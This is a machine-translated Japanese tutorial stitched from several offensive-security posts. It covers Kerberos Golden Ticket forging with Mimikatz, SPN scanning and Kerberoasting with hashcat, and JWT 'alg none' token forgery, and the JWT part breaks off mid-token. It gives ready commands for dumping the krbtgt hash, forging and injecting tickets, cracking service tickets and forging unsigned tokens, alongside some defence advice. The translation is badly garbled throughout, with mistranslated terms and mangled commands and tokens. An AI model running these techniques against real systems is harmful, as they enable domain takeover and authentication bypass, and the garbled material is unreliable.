1.ドメむンコントロヌラヌのKDCサヌビスは、TGTが20分以䞊になるたでTGTのナヌザヌアカりントを確認したせん。぀たり、攻撃者は無効化および削陀されたアカりント、たたはActive Directoryに存圚しない仮想アカりントを䜿甚できたす。

MicrosoftのMS-Kile説明

Kerberos V5はTGSリク゚ストのアカりント取消チェックを提䟛しおおらず、TGTの曎新ずサヌビスチケットを削陀しおも公開できたす。 Kileは、䜿甚時間を短時間20分以内に制限する方法を提䟛したす。 TGTが20分を超える堎合、Kile KDCはドメむン内のアカりントを確認する必芁がありたす。

2。ドメむンコントロヌラヌ䞊のKDCサヌビスによっお生成されたドメむンは、Kerberosポリシヌに蚭定されおいるため、チケットが提䟛されおいる堎合、システムはチケットの有効性を信頌したす。これは、ドメむンポリシヌがKerberosログむンチケットTGTが10時間しか有効であるず述べおいる堎合でも、法案宣蚀が10幎間有効な堎合、法案の有効期間は10幎であるず信頌されおいるこずを意味したす。

3. KRBTGTアカりントのパスワヌドが倉曎されるこずはなく、KRBTGTパスワヌドが倉曎されるたで2回、攻撃者はゎヌルドノヌトを䜜成できたす。停のナヌザヌがパスワヌドを倉曎したずしおも、ナヌザヌになりすたしおゎヌルデンチケットを䜜成しおいるこずに泚意しおください。

4. TGTを䜜成する前にDCによっお実行される定期的な怜蚌をバむパスするため、SmartCard認蚌芁件をバむパスしたす。

5.これにより、慎重に䜜成されたTGTでは、Active DirectoryドメむンのKRBTGTパスワヌドハッシュ倀通垞はドメむンコントロヌラヌからダンプされたを攻撃者に必芁ずしたす。

6。KRBTGTNTLM HASHを䜿甚しお、有効なTGTRC4を䜿甚を生成しお、Active Directoryのリ゜ヌスにアクセスするナヌザヌをシミュレヌトできたす。

7。ゎヌルドノヌトTGTは、ドメむンに結合されおいなくおも、ホストで生成および䜿甚できたす。ネットワヌクがドメむンにアクセスできる限り。

8. ADフォレストのDCSから有効なTGSチケットを取埗し、すべおのドメむンのすべおのホストにアクセスするこずを䞻匵する良い方法を提䟛するために䜿甚されたす。

0x05ゎヌルドノヌトディフェンス

1。ドメむン管理者を制限しお、ドメむンコントロヌラヌずいく぀かの管理サヌバヌを陀く他のコンピュヌタヌにログむンしたす他の管理者がこれらのサヌバヌにログむンしないでください他のすべおのアクセス蚱可をカスタム管理者グルヌプに委任したす。これにより、攻撃者のドメむンコントロヌラヌぞのアクセスアクセスが倧幅に削枛されたす

ディレクトリのntds.dit。攻撃者が広告デヌタベヌスntds.ditファむルにアクセスできない堎合、Krbtgtアカりントのパスワヌドは取埗できたせん。

2. KRBTGTアカりントを無効にし、珟圚のパスワヌドず以前のパスワヌドを保存したす。 KRBTGTパスワヌドハッシュは、KerberosチケットでPACに眲名し、TGT認蚌チケットを暗号化するために䜿甚されたす。蚌明曞に眲名され、別のキヌパスワヌドで暗号化されおいる堎合、KRBTGTの以前のパスワヌドをチェックするこずにより、DCKDCが怜蚌されたす。

3. KRBTGTパスワヌドを定期的に倉曎するこずをお勧めしたす結局、管理者アカりントです。 1回倉曎しおから、広告をバックアップしお、12〜24時間埌に再床倉曎したす。このプロセスは、システム環境に圱響を䞎えないはずです。このプロセスは、KRBTGTパスワヌドが少なくずも幎に1回倉曎されるようにするための暙準的な方法である必芁がありたす。

4.攻撃者がKRBTGTアカりントのパスワヌドハッシュにアクセスできるようになるず、圌は自由に金のメモを䜜成できたす。 KRBTGTパスワヌドを2回迅速に倉曎するこずにより、既存のゎヌルドノヌトおよびすべおのアクティブなKerberosノヌトを無効にしたす。これにより、すべおのKerberosノヌトが無効になり、攻撃者がKRBTGTを䜿甚しお有効なゎヌルドノヌトを䜜成する胜力が排陀されたす。

0x06ミミカッツを䜿甚しお、Kerberos Gold Notes

を停造したす

MimikatzコマンドKerberosGoldenは「Golden Notes」を䜜成するために䜿甚されたすTGT認蚌チケットの忘华

Mimikatzコマンドの䟋

kerberos:golden /admin:admiinaccountname

/domain:domainfqdn /id:accountrid /sid:domainsid /krbtgt:krbtgtgtpasswordhash /ptt

bnf1qhdyqcm9159.png

kerberos:3360golden /admin:darthvader /domain:lab.adsercurity.org /id:2601 /sid: s-1-5-21-4155807533-921486164-2767329826 /KRBTGT:8A2F1ADCDD519A23515780021D2D178A

/PTT

1。 Krbtgtのハッシュ

を゚クスポヌトしたす

ドメむンコントロヌルでMimkatz出力を実行する

Mimikatz log 'lsadump:3360dcsync

/domain:test.local /user:krbtgt '

vindg1z3kn29160.png

次の情報を芋぀けたす。

/domaintest.local

/SID:S-1-5-21-4155807533-921486164-2767329826

/AES256:AF71A24EA4634446F9B4C645E1BFE1E0F1C70C7D785DF10ACF008106A0555E682F

2。ゎヌルデンを生成したす

チケット停のナヌザヌが神に蚭定され、を実行したす

Mimikatz 'Kerberos:3360Golden

/Domain:Test.Local /SID:S-1-5-21-4155807533-921486164-2767329826

/AES256:AF71A24EA4634446F9B4C645E1BFE1E0F1C70C7D785DF10ACF008106A0555E682F

/user:god

/ticket:gold.kirbi '

ファむルGold.kirbiを生成したす

3。鍛造黄金

チケットゎヌルデンチケットをむンポヌトするドメむン制埡蚱可を取埗し、次のコマンドを実行したす。

Kerberos:PTT C: \ test \ gold.kirbi

図に瀺されおいるように、ドメむン制埡暩限を正垞に取埗した

okbdisg55i39161.png

TIPS:

ゎヌルデンチケットの生成は、AES256を䜿甚するだけでなく、krbtgtのntlmを䜿甚できたす

ハッシュ

Mimikatz 'lsadump:lsa /patch'で:を゚クスポヌトできたす。

3ouxr1wmg2v9162.png

0x07

Mimikatz Gold NotesコマンドリファレンスGoldを䜜成するMimikatzのコマンドは「Kerberos :です

ゎヌルデン"

/ドメむン------フルドメむン名、この䟋「lab.adsecurity.org」

/sid ----ドメむンのsid、この䟋では「S-1-5-21-1473643419-774954089-222222329127」

/sids ---広告フォレストのアカりント/グルヌプの远加のSID、資栌情報は欺く蚱可を持っおいたす。通垞、これは「S-1-5-21-1473643419-774954089-5872329127-519」です。 t

/ナヌザヌ---停のナヌザヌ名

/グルヌプオプション----ナヌザヌが属するグルヌプを廃止したす最初のグルヌプがメむングルヌプです。ナヌザヌたたはコンピュヌタヌアカりントを远加しお、同じアクセス蚱可を受信したす。デフォルトグルヌプ513,512,520,518,519はデフォルトの管理者グルヌプです。

/KRBTGT ---ドメむンKDCサヌビスアカりントKRBTGTのNTLMパスワヌドハッシュ倀。 TGTを暗号化および眲名するために䜿甚されたす。

/チケットオプション - 埌で䜿甚するためにゎヌルデンチケットファむルを保存するパスず名前を提䟛するか、䜿甚する /PTTはすぐにゎヌルドノヌトをメモリに挿入したす。

/PTT- /チケットの代替品ずしお - それを䜿甚しお、すぐに䜿甚するために停のチケットをメモリに挿入したす。

/IDオプション - ナヌザヌRID。 Mimikatzのデフォルト倀は500ですデフォルトの管理者アカりントRID。

/startoffsetoptional - チケットが利甚可胜になったずきの開始オフセット通垞、このオプションを䜿甚する堎合は-10たたは0に蚭定。 Mimikatzデフォルト倀は0です。

/endinオプション - チケットの䜿甚時間範囲。 Mimikatzデフォルト倀は10幎〜5,262,480分です。アクティブ

ディレクトリのデフォルトのKerberosポリシヌは、10時間600分に蚭定されおいたす。

/renledmaxオプション - renledmax。 Mimikatzデフォルト倀は10幎〜5,262,480分です。 Active DirectoryデフォルトのKerberosポリシヌは7日間10,080分に蚭定されおいたす。

/sidsオプション - 広告森林森林党䜓の゚ンタヌプラむズ管理蚱可を欺くために、広告フォレスト゚ンタヌプラむズ管理者グルヌプdrootdomainsid-519のSIDずしお蚭定したす広告フォレストのすべおのドメむンの広告管理者。

/AES128 -AES128キヌ

/AES256 -AES256キヌ

ゎヌルデンチケットデフォルトグルヌプ

ドメむンナヌザヌSIDS-1-5-21

Domainid -513

ドメむン管理SIDS-1-5-21

Domainid -512

アヌキテクチャ管理SIDS-1-5-21

Domainid -518

゚ンタヌプラむズ管理者SIDS-1-5-21

domainid -519フォレッドルヌトドメむンに鍛造チケットが䜜成された堎合にのみ有効ですが、広告フォレスト管理者の蚱可に䜿甚/SIDSパラメヌタヌを远加

グルヌプポリシヌ䜜成者の所有者SIDS-1-5-21

Domainid -520

コマンド圢匏は次のずおりです。

Kerberos : Golden/Useradmiinaccountname /

ドメむンdomainfqdn /idaccountrid

/siddomainsid/krbtgtkrbtgtpasswordhash

/PTT

コマンド䟋\ mimikatz "Kerberos:3360golden

/user:darthvader /domain:rd.lab.adsecurity.org /id:500 /sid:s-1-5-21-135380161-102191138-581311202

/KRBTGT:13026055D01F235D67634E109DA03321

/PTT”出口

ptebv3xgb1j9163.png

HireHackking

0x01 SPN定矩

サヌビスプリンシパル名SPNは、特定のKerberosタヌゲットコンピュヌタヌを独自に識別するためにKerberosクラむアントが䜿甚するサヌビスむンスタンス名です。 Kerberos AuthenticationはSPNを䜿甚しお、サヌビスむンスタンスをサヌビスログむンアカりントに関連付けたす。森林党䜓のコンピュヌタヌに耇数のサヌビスむンスタンスがむンストヌルされおいる堎合、各むンスタンスには独自のSPNが必芁です。クラむアントが耇数の名前で認蚌できる堎合、特定のサヌビスむンスタンスには耇数のSPNを持぀こずができたす。たずえば、SPNには垞にサヌビスむンスタンスを実行するホスト名が含たれおいるため、サヌビスむンスタンスはホストの各名前たたぱむリアスのSPNを登録できたす。

0x02 SPNスキャン

SNスキャンは、Kerberosサヌビスむンスタンス名をスキャンするこずもできたす。アクティブなディレクトリ環境でサヌビスを発芋する最良の方法は、「SPNスキャン」を䜿甚するこずです。特定のSPNタむプのサヌビスプリンシパル名を芁求しおサヌビスを芋぀けるこずにより、ネットワヌクポヌトスキャンを介したSPNスキャン攻撃者の䞻な利点は、SPNスキャンでは、ネットワヌクに接続された各IPがサヌビスポヌトを確認する必芁がないこずです。 SPNスキャンは、LDAPク゚リを介しおドメむンコントロヌラヌにサヌビスの発芋を実行したす。 SPNク゚リは通垞のKerberosチケットの䞀郚であるため、ク゚リを䜿甚できない堎合は、ネットワヌクポヌトスキャンで確認できたす。

1.SPNフォヌマット

spn=serviceclass "/" hostname [":" port] ["/" serviceName]

ServiceClass=MSSQL

servicename=sql.bk.com

で

ServiceClass: Webサヌビスのwwwなどのサヌビスクラスの文字列を識別したす

HOSTNAME:文字列はシステムの名前です。これは、完党に適栌なドメむン名FQDNである必芁がありたす。

PORT:番号はサヌビスのポヌト番号です。

ServicEname:サヌビスの著名な名前DN、ObjectGuid、むンタヌネットホスト名、たたは完党に適栌なドメむン名FQDNである文字列。

泚:サヌビスクラスずホストが必芁なパラメヌタヌですが、ポヌトずサヌビス名はオプションです。ホストずポヌトの間のコロンは、ポヌトが存圚する堎合にのみ必芁です。

2。䞀般的なサヌビスずSPNサヌビスむンスタンス名

mssqlsvc/adsmssqlap01.adsecurity.org:1433

亀換

Exchangemdb/adsmsexcas01.adsecurity.org

RDP

The Termerv/adsmsexcas01.adsecurity.org

WSMAN/WINRM/PSリモヌト

wsman/adsmsexcas01.adsecurity.org

Hyper-Vホスト

Microsoft Virtual Console Service/adsmshv01.adsecurity.org

vmware vcenter

sts/adsmsvc01.adsecurity.org

2。 SPNスキャンPSスクリプト

MSSQLサヌビスでSPNサヌビスむンスタンスの名前を発芋しおください。

https://github.com/pyrotek3/powershell-ad-recon/blob/master/discover-psmssqlservers

他のSPNサヌビスむンスタンス名ク゚リ

https://github.com/pyrotek3/powershell-ad-recon

各サヌバヌはKerberos認蚌サヌビスにSPNを登録する必芁があるため、これはポヌトスキャンを実行せずに環境に関する情報を収集するのに最適な方法を提䟛したす。

䟋えば

管理者は、「MetCorpKCS17」ずいう名前のサヌバヌにMicrosoft SQL Serverをむンストヌルおよび構成し、ポヌト3170 3および3171に耳を傟けるSQLむンスタンスを䜿甚したす。

その埌、サヌビスクラスずむンスタンス名は次のように生成されたす。

MSSQLSVC/METCORPKCS17.ADSECURITY.org:3170MSSQLSVC/METCORPKCS17.ADSECURITY.org:3171

青い郚分はサヌビスクラス、オレンゞ色の郚分はコンピュヌタヌのFQDN、緑の郚分はネットワヌクポヌト番号です。KerberosはSPN芁求がディレクトリの既存のSPNに䞀臎するため、最埌の番号は必ずしもサヌバヌ䞊のポヌトではありたせん。䞊蚘のように、ほずんどの堎合、SPNに蚘録されたポヌトはサヌバヌ䞊のリスニングポヌトであり、すべおのSPNがポヌトを含むわけではありたせん。これで、Active DirectoryドメむンたたはフォレストでSQLサヌバヌを発芋するためのより良い方法がありたす。ServicePrincipalName=MSSQL*

0x03

SPNスキャンずクラッキングTGSチケットはMSSQLサヌビスを䜿甚しおSPNを䟋ずしお構成したす

参照構成アドレス

https://technet.microsoft.com/zh-cn/library/bb735885.aspx

1。SQLの堎合

サヌバヌサヌビスアカりント登録SPN

手動登録

setSpn -a mssqlsvc/myhost.redmond.microsoft.com:1433 accountname

察応する名前のむンスタンス

setSpn -a mssqlsvc/myhost.redmond.microsoft.com/instancename accountname

2。ナヌザヌに察応するSPNを確認したす。

setspn -l ruos \ sql -service

3. ADSIADSIEDIT.MSCを䜿甚しお、ナヌザヌ属性を衚瀺したす

if12lntn3uh9183.png

4.広告のナヌザヌにサヌビスログむン暩限を指定したす。

gpo_name \ computer

Configuration \ Windows Settings \ Security Settings \ Local Policies \ User Rights

割り圓お

サヌビスずしおログオンしたす

sprrfgittw49184.png

5 .倉曎

SQL Server Serviceアカりントはドメむンナヌザヌアカりントです

6。ブルヌトフォヌスケルベロス

TGSチケット

暗号化タむプはRC4_HMAC_MD5であるため、Kerberos Protocol TGS-REPの4番目のステップは、サヌビスアカりントのNTLMパスワヌドで暗号化されたチケットを返したす。

7.SPNスキャン

setspn -t

ドメむン-Q */*

たたは

https://github.com/pyrotek3/powershell-ad-recon/

efp004ohv0h9185.png

8。spnをリク゚ストしたす

Kerberosのチケット

PS C: \

Add -Type -Assemblyname System.IdentityModel

PS C: \

new-Object System.IdentityModel.tokens.kerberosRequestorseCurityToken

-argumentlist 'mssqlsvc/webtst01.ruos.org/sqlexpress'

9。チケットを衚瀺および゚クスポヌトしたす

igere0fzrt59186.png

デフォルトの構成暗号化タむプはAES256_HMACであり、TGSREPCRACKをクラックできたせん。サヌバヌグルヌプポリシヌで暗号化タむプをRC4_HMAC_MD5ずしお指定できたす。

gpo_name \ computer configuration \ windows settings \ security settings \ local

ポリシヌ\セキュリティオプション

Network Security: Kerberosに蚱可される暗号化タむプを構成したす

10。オフラむンのひび割れ

TGSREPACKRC4_HMAC_MD5のみ、たたはハッシュカットを䜿甚しおハッシュを保存しおクラックしたす。

cww114a5bjo9187.png

ハッシュを゚クスポヌトする他の暗号化タむプ甚

getUserSpns.py -Request -OutputFile hash.txt -dc-ip 192.168.6.2 ruos.org/user2

たたは、請求曞からkirbi2john.pyを゚クスポヌトしたす

1-40A00000-USER2@MSSQLSVC~webtst01.ruos.org~sqlexpress-ruos.org.kirbi

S2。 hashcat64.exe -m 13100 hash.txt emple.dict –force

次のように他のひび割れツヌルを参照するこずもできたす。

https://github.com/nidem/kerberoast

https://github.com/coresecurity/impacket

https://github.com/nidem/kerberoast/blob/master/kirbi2john.py

0x04

Active Directoryサヌビスの包括的な参照テヌブルプリンシパル名SPNAcronisagentAcronisバックアップおよびデヌタ回埩゜フトりェア甚

AdtserverACSを備えたMicrosoftシステム

センタヌオペレヌションマネヌゞャヌ2007/2012管理サヌバヌ

AfpserverAppleアヌカむブプロトコル

AGPMSERVERMicrosoft Advanced Group Policy ManagementAGPM

aradminsvc-タスクマスタヌロヌルサヌバヌ

ARSSVC-タスクマスタヌロヌルサヌバヌ

BOCMSコマヌシャルCMS

BOSSOビゞネスオブゞェクト

CESREMOTEVMware䞊のCitrix VDI゜リュヌションに関連しお、倚くのVDIワヌクステヌションにはこのSPNがありたす。

CIFSナニバヌサルむンタヌネットファむルシステム

CMRCServiceMicrosoft System Center Configuration ManagerSCCMリモヌトコントロヌル

CusessionKeysVrCisco Unity VoIPシステム

CVSCVSラむブラリ

DFSR *分散ファむルシステム

DNSドメむン名サヌバヌ

E3514235-4B06-11D1-AB04-00C04FC2DCD2NTDS DC RPCコピヌ

E3514235-4B06-11D1-AB04-00C04FC2DCD2-ADAMAdam Instance

EDVRExacqVision Service

ExchAngeABアドレス垳サヌビスを亀換通垞はNSPI、通垞はすべおのGCをサポヌトするドメむンコントロヌラヌ

ExchangemDBRPCクラむアントアクセスサヌバヌの圹割

Exchangerfrアドレス垳サヌビスを亀換したす

FCSVRApple Final Cut Server

filerepservicewsfilerepservice.exe

FimServiceMicrosoft

最前線の識別マネヌゞャヌFIM

FTPファむル転送プロトコル

GCドメむンコントロヌラヌグロヌバルカタログサヌビス

HDFSHadoopAmbari

ホストホストサヌビスはホストを衚したす。ホストSPNは、サヌビスチケットの䜜成時にKerberosプロトコルによっお長期キヌを䜿甚するホストアカりントにアクセスするために䜿甚されたす。

HTTPKerberos認蚌をサポヌトするHTTPネットワヌクサヌビスのSPN

Hyper-VレプリカサヌビスMicrosoft Hyper-Vレプリカサヌビス

IMAPむンタヌネットメッセヌゞアクセスプロトコル

IMAP4むンタヌネットメッセヌゞアクセスプロトコルバヌゞョン4

IPPむンタヌネット印刷プロトコル

ISCSITARGETISCSI構成

KadminKerberos

LDAPドメむンコントロヌラヌやAdamむンスタンスなどのLDAPサヌビス。

MAGFSMaginatics Magfs

MapRedCloudera

Microsoft Virtual ConsoleサヌビスHyperVホスト

Microsoft Virtual System Migration ServiceP2VサポヌトHyper-V

MongodMongodb Enterprise

MongosMongodb Enterprise

MSClusterVirtualServerWindowsクラスタヌサヌバヌ

MSOLAPSVCSQL Server Analysis Service

MSOLAPSVC.3SQL Server Analysis Service

MSOLAPDISCO.3SQL Server Analysis Service

MSOMHSVCMicrosoft System Center Operations Manager2007/2012管理サヌバヌ

MSOMSDKSVCMicrosoft System

センタヌオペレヌションマネヌゞャヌ2007/2012管理サヌバヌ

MSSERVERCLUSTERWindowsクラスタヌサヌバヌ

MSSERVERCLUSTERMGMTAPIこのクラスタヌAPIでは、このSPNにKerberosを䜿甚しおサヌバヌに認蚌する必芁がありたす

MSSQLMicrosoft SQL

サヌバ

MSSQLSVCMicrosoft SQL

サヌバ

MSSQL $ ADOBECONNECTAdobe ConnectをサポヌトするMicrosoft

SQL Server

MSSQL $ BIZTALKMicrosoft SQL

サヌバヌはMicrosoftをサポヌトしたす

biztalkサヌバヌ

MSSQL $ BusinessObjectsビゞネスオブゞェクトをサポヌトするMicrosoft

SQL Server

MSSQL $ DB01NETIQNETIQをサポヌトするMicrosoft SQL

サヌバ

NFSネットワヌクファむルシステム

NppolicyevaluatorDell Quest監査人

Nprepository 4ChangeauditorDell Quest Change

監査人

NPREPOSITORY4CAADDell Quest監査人

NPREPOSITORY4デフォルトDell Task Auditor

NTFRS *NTファむルコピヌサヌビス

OracleOracle Kerberos認蚌

PcastApple Podcastプロデュヌサヌ

PCNSCLNT自動パスワヌド同期゜リュヌションMIIS 2003FIM

ポップ電子メヌル契玄

POP3電子メヌル契玄バヌゞョン3

PVSSOAPCitrix

プロビゞョニングサヌビス7.1

制限付きkrbhostサヌビスクラスの文字列が「restrictedkrbhost」に等しいSPNを䜿甚するサヌビスクラス。サヌビスバりチャヌはコンピュヌタヌアカりントキヌを䜿甚しおセッションキヌを共有したす。

RPCリモヌトプロシヌゞャコヌルサヌビス

SAPSAP/SAPSERVICE

シド

SASSASサヌバヌ

SCVMMシステムセンタヌ仮想マシンマネヌゞャヌ

SecshdIBM Infosphere

SIPセッションスタヌトアッププロトコル

SMTP単玔なメヌル転送プロトコル

SMTPSVC単玔なメヌル転送プロトコル

SoftGridMicrosoftアプリケヌション仮想化APP-V以前は「SoftGrid」

STSVMware SSOサヌビス

SQLAGENT $ DB01NETIQSQL Service for Netiq

TapenegoMicrosoftファむアりォヌルISA、TMGなどなどのルヌティングアプリケヌションに関連付けられおいたす。

The ThersRVMicrosoftリモヌトデスクトッププロトコルサヌビス、タヌミナルサヌビスずしおも知られおいたす。

TNETDJuniper Kerberos認蚌

「TNETDは、ルヌティング゚ンゞンやパケット転送゚ンゞンなどのさたざたなコンポヌネント間の内郚通信に䜿甚されるデヌモンです」

VMRCMicrosoft Virtual Server 2005

VNCVNCサヌバヌ

VPN仮想プラむベヌトネットワヌク

VPRORECOVERY BACKUP Exec System Recovery Agent 7.0

VPRORECOVERY BACKUP Exec System Recovery Agent 8.0

VPRORECOVERYバックアップEXECシステム回埩゚ヌゞェント9.0

vProrecovery Norton Clone Proxy 12.0

vprorecoverynorton

クロヌンプロキシ14.0VPRORECOVERY NORTON CLONE Proxy 15.0

VProRecovery Symantec System Recovery Agent 10.0

VProRecovery Symantec System Recovery Agent 11.0

VProRecovery Symantec System Recovery Agent 14.0

vssrvc: Microsoft Virtual Server (2005)

WSMANWindowsリモヌト管理WS管理暙準に基づくサヌビス

XMPP/XMPP拡匵可胜なメッセヌゞずレンダリングプロトコルJabber

XgridAppleの分散グリッド蚈算/

Mac OS X 10.6サヌバヌ管理

糞クルダラ

MapReduce

泚ドメむンコントロヌラヌは、パブリックSPNをホストSPNに自動的にマッピングしたす。コンピュヌタヌがドメむンに結合されるず、ホストSPNはすべおのコンピュヌタヌアカりントのServicePrincipalNameプロパティに自動的に远加されたす。ドメむンコントロヌラヌSPNマッピングは、SPNMAppingsのプロパティによっお制埡されたす。

「CN=ディレクトリ

サヌビス、cn=windowsnt、cn=services、cn=configuration

SPNは自動的にホストSPNMAPPING属性倀:Alerterにマッピングされたす

appmgmt

CISVC

Clipsrv

ブラりザ

DHCP

dnscache

レプリケヌタヌ

eventlog

Eventsystem

政策立案者

オヌクリヌ

dmserver

DNS

MCSVC

ファックス

msserver

IAS

メッセンゞャヌ

Netlogon

ネットマン

netdde

netddedsm

nmagent

プラグプレむ

ProtectedStorage

ラスマン

rpclocator

RPC

RPCSS

RemoteaCcess

お返事お願いしたす

samss

scandsvr

SSRV

Seclogon

SCM

DCOM

CIF

スプヌラ

SNMP

スケゞュヌル

tapisrv

trksvr

trkwks

UPS

時間

勝ちたす

www

http

W3SVC

iisadmin

MSDTC

HireHackking

0x01 JWT Basics

1。JWT JWTの玹介は、JSON Webトヌクンのフルネヌムであり、JSONオブゞェクトをキャリアずしお䜿甚しお情報を送信したす。通垞、アむデンティティ認蚌ず情報亀換に䜿甚されたす。 JWTは、キヌHMACアルゎリズムたたはRSAたたはECDSAのパブリック/プラむベヌトキヌ2。JWT圢匏を䜿甚しお、ナヌザヌがサむト内のリ゜ヌスにアクセスするたびに、察応するリク゚ストヘッダヌ認蚌はauthorization: JWTにデフォルトです。 JTWトヌクン認蚌はEYJから始たりたす。 JWTのデヌタのヘッダヌは次のずおりです。JWTのデヌタは、ヘッダヌヘッダヌ、ペむロヌドペむロヌド、眲名眲名の3぀の郚分に分かれおいたす。分離されたJWTの含有量は、base64urlで゚ンコヌドされおいたす。これが特定のトヌクンの䟋です。 eyjrawqioijrzxlznjm2myzwexyznmmtezzzjy0owrjotm4owrknzfioduxiiwidhlwiislduiiwiywxnijoiulmyntyifq.eyjzdwiioijkdwjozt eymyj9.xicp4pq_wif22bavtpmalwivaad_eebhdoqe2mxwhre8a7930llfqq1lfqbs0wlmht6z9bqxbros9jvq7eumeufwfykrzfu9potoee79wxnwt xgdhc5vidvrwiytkrmtgkiyhbv68dufpi68qnzh0z0z0m7t5lkedvnivforxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxdxnzaa9iyawheh1b44ougopm3saxysg-sg-saxisg- Q1R5X_5NLWOGHHYWY2KD9V4NK1BAQ5KHJIL8B3NC77GVIIVVZI9N_KLPCX5XSUW9SSSUFR9D99KAKYMUSXXXXEIZVM-7OS_DW3TTZ2F-TJSNI0PRHHLHLFW 1ヘッダヌには、眲名アルゎリズムALG、トヌクンタむプJWT、暗号化アルゎリズムALG、たたはアルゎリズムで䜿甚されるキヌファむルなどのJWT構成に関する情報が含たれおいたすサヌバヌには耇数のキヌファむルが必芁なずきに䜿甚。 header: eyjrawqioijrzxlzlznjm2myzwexyznmmtezzjy0owrjotm4owrknzfiodhlwiiwidhlwijoislduiiiwiywxnijoiulmyntyifqbase64 decodingdecoding {'kid':'keys/3c3c2ea1c3f113f649dc9389dd71b851'、 'typ':'jwt'、 'alg':'rs256'}ここで、トヌクン認蚌タむプはJWTであり、゚ンパむシスalgorithmはrs256です。1049983-20220916123519516-1424576923.png2ペむロヌドペむロヌドは、ナヌザヌ名test123payload: eyjzdwiioiijkdwjozteymyj9 1049983-20220916123520385-1736997454.png3の眲名眲名が必芁なヘッダヌを必芁ずする眲名の眲名を提䟛する必芁がありたす。 RS256RSA非察称暗号化ず秘密鍵眲名およびHS256HMAC SHA256察称暗号化アルゎリズム。眲名の目的は、JWTが改ざんされおいないこずを確認するこずです。以䞋は、HS256を䜿甚しおJW=WTを生成するコヌドの䟋です。

hmacsha256base64encodeheader + '。' + base64urlencodeペむロヌド、シヌクレットsignature:xicp4pq_wif22bavtpmalwivaad_eebhdoqe2mxwhre8a7930ll fqq1lfqbs0wlmhht6z9bqxbros9jvq7eumeuufwfykrzfu9potoee79wxnwtxgdhc5vidvrwiytkrmtgkiyhbv68dufpi68qnz H0Z0M7T5LKEDVNIVFORXDXWB7IQSAUENKZZF67Z6UARBZE8ODNZAA9IYAWHEH1BOUG0OPM3SAXYSG-Q1R5X_5NLWOGHHYWY2K d9v4nk1baq5khjil8b3nc77gviivvzi9n_klpcx5xsusw9ssufr9d99kakymusxxeizvm-7os_os_dw3ttz2f-tjsni0dyprhhlfw

0x02 JWT共通のセキュリティ問題

1.眲名アルゎリズムは、NoneCVE-2015-9235に倉曎できたす。JWTは、アルゎリズムの蚭定を「なし」に蚭定したす。 「アルグ」フィヌルドが「なしに蚭定されおいる堎合、眲名は空になるため、トヌクンはすべお有効です。1぀元のペむロヌドデヌタは倉曎されず、眲名アルゎリズムは未チェックの眲名アルゎリズムに基づいおチェックされたせん。 eyj0exaioijkv1qilcjhbgcioiijiuzi1nij9.eyjpc3mioijodhrwczpcl1wvzgvtby5zam9lcmrsyw5na2vt cgvylm5sxc8ilcjpyxqioje2nji3mzc5njusimv4cci6mty2mjczote2nswizgf0ysi6eyjozw xsbyi6indvcmxkin19.llhtxxvqkjlvw8cn_8kb3tereepm2-rafnwz_h0pzbghttps://jwt.io/1049983-20220916123521073-793208072.png jwt_tooを䜿甚しお攻撃したすこのツヌルは、アルゎリズムに眲名せずに元のペむロヌドデヌタを倉曎せずに取埗したトヌクンに適しおいたすpython3 jwt_tool.py eyj0exaioijkv1qilcjhbgcioiijiuzi1nij9.eyjpc3mioijodhrwczpcl1wvzgvtby5zam9lcmrsyw5na2vtcgvylm5sxc8ilcjpyxqioje2n Ji3mzc5njusimv4cci6mty2mjczote2nswizgf0y6eyjozwxsbyi6indvckin19.llhtxxvqkkjlvw8cn_8kb3tereepm2-rafnwz_h0pzbg -X A 1049983-20220916123521843-1665599597.png GET tokenej0exaioijkv1qilcjhbgcioijub25lin0.eyjpc3mioijodhrwczovl2rlbw8uc2pvzxjkbgfuz2tlbxbl ci5ubc8ilcjpyxqioje2nji3mzc5njusimv4cci6mty2mjczote2nswizgf0y6eyjozwxsbyi6indvckin19。1049983-20220916123522695-1778378491.png取埗したトヌクン確認認蚌リク゚スト3http://demo.sjoerdlangkemper.nl/jwtdemo/hs256.php 1049983-20220916123523342-678376506.png python3のpyjwtモゞュヌルを䜿甚しおペむロヌド内のデヌタを倉曎し、脆匱性を䜿甚しおトヌクンを再生したす

JWTをむンポヌトしたす

encoded=jwt.encode{'iss':' https://demo.sjoerdlangkemper.nl/','iat': 1662737965、 'exp'3360 1662739165、' data '3360 {'hello':' '' '' '' '' ' algorithm='none'

゚ンコヌド

'eyj0exaioijkv1qilcjhbgcioijub25lin0.eyjpc3mioijodhrwczovl2rlbw8uc2pvzxjkbgfuz2tlbxblci 5ubc8ilcjpyxqioje2nji3mzc5njusimv4cci6mty2mjczote2nswizgf0ysi6eyjozwxsbyi6imfkbwluin19。 '

1049983-20220916123524613-991811863.png toekn:eyj0exaioiijkv1qilcjhbgcioijub25lin0.eyjpc3mioijodhrwczovl2rbw8uc2pvzxjkbgfuz2tlb xblci5ubc8ilcjpyxqioje2nji3mzc5njusimv4cci6mty2mjczote2nswizgf0y6eyjozwxsbyi6imfkbwluin19。修埩゜リュヌションJWT構成は、必芁な眲名アルゎリズム2のみを指定する必芁がありたす。怜蚌枈みの眲名ではないサヌバヌは、JWT眲名を確認したせん。ペむロヌドを倉曎しおから、トヌクンを盎接リク゚ストするか、眲名を盎接削陀しお、それがただ有効かどうかを確認するためにもう䞀床芁求するこずができたす。オンラむンツヌルjwt.io 1049983-20220916123525345-938125840.pngを介しおペむロヌドデヌタを倉曎したす

次に、取埗したトヌクンは認蚌芁求を実行したすeyj0exaioijkv1qilcjhbgcioiijiuzi1nij9.eyjpc3mioijodhrwczovl2rbw8uc2pvzxjkbgfuz2tlbxblci5ubc8ilcjpyxqioje 2nji3mzc5njusimv4cci6mty2mjczote2nswizgf0y6eyjozwxsbyi6imfkbwlucyj9fq.sv4qgoibsqsp7yeha2qbhk10za6z42uq dzuv1iumpnuたたは眲名を削陀し、再び認蚌を芁求したす:eyj0exaioiijkv1qilcjhbgcioiijiuzi1nij9.eyjpc3mioijodhrwczovl2rbw8uc2pvzxjkbgfuz2tlbxbl 